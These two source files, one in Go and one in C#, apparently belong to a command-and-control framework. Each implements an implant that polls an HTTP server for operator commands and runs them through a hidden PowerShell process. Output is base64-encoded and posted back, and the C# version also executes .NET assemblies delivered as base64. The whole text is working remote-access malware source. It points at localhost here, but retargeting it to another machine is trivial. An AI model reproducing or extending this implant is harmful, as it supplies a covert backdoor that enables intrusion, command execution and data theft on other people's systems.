File: Implementation/Code/dll/implant_dll.go
package main

import (
	"C"
	"bytes"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"os/exec"
	"strings"
	"time"
)

type Command struct {
	Input        string `json:"Input"`
	ImplantUser  string `json:"ImplantUser"`
	Operator     string `json:"Operator"`
	TimeToExec   string `json:"timeToExec"`
	Delay        string `json:"delay"`
}

type Output struct {
	ImplantId    string `json:"ImplantId"`
	OperatorId   string `json:"OperatorId"`
	Output       string `json:"Output"`
	DateFromLast string `json:"DateFromLast"`
}

//export InvokeMain
func InvokeMain() {
	implantId := os.Getenv("COMPUTERNAME")

	// Fetch command from the server
	resp, err := http.Get("http://127.0.0.1:8081/fetchCommand")
	if err != nil {
		fmt.Println("Failed to fetch command.")
		return
	}

	defer resp.Body.Close()
	body, _ := ioutil.ReadAll(resp.Body)
	jsonResponse := string(body)

	// Parse command from the JSON response
	command := &Command{}
	json.Unmarshal([]byte(jsonResponse), command)

	// Execute command using powershell
	cmd := exec.Command("powershell.exe", "-Command", command.Input)
	cmdOutput := &bytes.Buffer{}
	cmd.Stdout = cmdOutput
	err = cmd.Run()
	if err != nil {
		fmt.Println("Error:", err)
		return
	}

	// Convert command output to base64
	output := cmdOutput.String()
	outputBase64 := base64.StdEncoding.EncodeToString([]byte(output))

	// Create JSON payload for the server
	outputObj := Output{
		ImplantId:    implantId,
		OperatorId:   command.Operator,
		Output:       outputBase64,
		DateFromLast: time.Now().Format(time.RFC3339),
	}

	outputJson, _ := json.Marshal(outputObj)

	// Send output to the server
	_, err = http.Post("http://127.0.0.1:8081/fetchOutput", "application/json", strings.NewReader(string(outputJson)))
	if err != nil {
		fmt.Println("Failed to send output.")
		return
	}

	fmt.Println("Output sent successfully")
}

func main() {
	// We leave main empty
}

File: Implementation/ImplantDLL/ImplantDLL.cs
using System;
using System.Diagnostics;
using System.Net;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
using HTTPImplant.Modules;

namespace HTTPImplant
{
    public class ImplantDLL
    {
        public string host { get; set; }
        public string port { get; set; }
        private static string lastCommandExecuted = string.Empty;

        public static void StartImplant(string[] args)
        {
            string implantId = Environment.MachineName;
            var webClient = new WebClient();

            var checkForCommandTimer = new System.Timers.Timer(7000); // 7 seconds
            checkForCommandTimer.Elapsed += (sender, e) =>
            {
                webClient.DownloadStringAsync(new Uri("http://127.0.0.1:8081/fetchCommand"));
            };
            checkForCommandTimer.AutoReset = true;
            checkForCommandTimer.Enabled = true;

            webClient.DownloadStringCompleted += (sender, e) =>
            {
                if (e.Error == null)
                {
                    string jsonResponse = e.Result;

                    Command command = new Command();
                    // Parsing the JSON.
                    command.Input = jsonResponse.Split(new string[] { "\"Input\":\"", "\",\"ImplantUser" }, StringSplitOptions.None)[1];
                    command.ImplantUser = jsonResponse.Split(new string[] { "\"ImplantUser\":\"", "\",\"Operator" }, StringSplitOptions.None)[1];
                    command.Operator = jsonResponse.Split(new string[] { "\"Operator\":\"", "\",\"timeToExec" }, StringSplitOptions.None)[1];
                    command.TimeToExec = jsonResponse.Split(new string[] { "\"timeToExec\":\"", "\",\"delay" }, StringSplitOptions.None)[1];
                    command.Delay = jsonResponse.Split(new string[] { "\"delay\":\"", "\",\"File" }, StringSplitOptions.None)[1];
                    command.File = jsonResponse.Split(new string[] { "\"File\":\"", "\",\"Command" }, StringSplitOptions.None)[1];
                    command.command = jsonResponse.Split(new string[] { "\"Command\":\"", "\"}" }, StringSplitOptions.None)[1];

                    // If the command received from the server is the same as the last executed command, ignore it
                    if (command.command == lastCommandExecuted)
                        return;

                    lastCommandExecuted = command.command;

                    // Decision based on Input
                    if (command.Input.Contains("os"))
                    {
                        ProcessStartInfo processStartInfo = new ProcessStartInfo
                        {
                            FileName = "powershell.exe",
                            Arguments = "-NoLogo -NonInteractive -NoProfile -Command " + command.command,
                            RedirectStandardOutput = true,
                            UseShellExecute = false,
                            CreateNoWindow = true
                        };
                        Process process = new Process
                        {
                            StartInfo = processStartInfo
                        };
                        process.Start();

                        string output = process.StandardOutput.ReadToEnd();
                        process.WaitForExit();
                        string outputBase64 = Convert.ToBase64String(Encoding.UTF8.GetBytes(output));
                        SendResult(webClient, implantId, command.Operator, outputBase64);
                    }
                    else if (command.Input.Contains("execute-assembly"))
                    {
                        byte[] bytes = Convert.FromBase64String(command.File);
                        string output = ExecuteAssembly.Execute(bytes);
                        string outputBase64 = Convert.ToBase64String(Encoding.UTF8.GetBytes(output));
                        SendResult(webClient, implantId, command.Operator, outputBase64);
                    }
                }
            };

            // Start with the first command check
            webClient.DownloadStringAsync(new Uri("http://127.0.0.1:8081/fetchCommand"));

            // To keep the console running, so it doesn't close before the async tasks complete
            Console.ReadLine();
        }

        public static void SendResult(WebClient webClient, string implantId, string operatorId, string outputBase64)
        {
            string resultJson = "{" + "\"ImplantId\": \"" + implantId + "\"," + "\"OperatorId\": \"" + operatorId + "\"," + "\"Output\": \"" + outputBase64 + "\"," + "\"DateFromLast\": \"" + DateTime.UtcNow.ToString("O") + "\"" + "}";
            webClient.UploadStringCompleted += (sender2, e2) =>
            {
            };
            webClient.UploadStringAsync(new Uri("http://127.0.0.1:8081/fetchOutput"), "POST", resultJson);
        }
    }

    public class Command
    {
        public string Input { get; set; }
        public string ImplantUser { get; set; }
        public string Operator { get; set; }
        public string TimeToExec { get; set; }
        public string Delay { get; set; }
        public string File { get; set; }
        public string command { get; set; }
    }
}